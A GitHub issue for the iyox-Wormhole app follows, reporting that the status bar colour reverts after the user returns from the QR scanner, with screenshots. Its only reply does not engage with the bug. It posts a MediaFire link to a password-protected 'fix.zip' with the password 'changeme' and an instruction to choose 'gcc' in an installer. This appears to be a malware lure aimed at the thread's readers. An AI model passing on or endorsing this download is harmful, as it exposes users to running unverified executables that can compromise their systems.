### ISSUE TITLE
UI Improvements

### ISSUE THREAD

**Issue by scientiac** [iyox-studios/iyox-Wormhole#28]
When going to the scanner and coming back the status bar turns back.

After going to scanner and returning,
![Screenshot_20240829-102856](https://github.com/user-attachments/assets/3f3dac92-2401-44ff-a2f7-e74b9b7217d0)

During scan,
![Screenshot_20240829-102848](https://github.com/user-attachments/assets/2a2fee74-3c3f-4604-94ea-db65c8bbae54)

Before scan,
![Screenshot_20240829-102832](https://github.com/user-attachments/assets/c88c9b0e-d59f-49ea-9261-c4aa36c88577)

Normally, the top portion is colored with an accent color to also color the status bar so it is visible in either of the modes like in the messages app below:
![Screenshot_20240829-103147](https://github.com/user-attachments/assets/e6d191a9-93bf-495c-b7dd-3e71a2273b55)

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
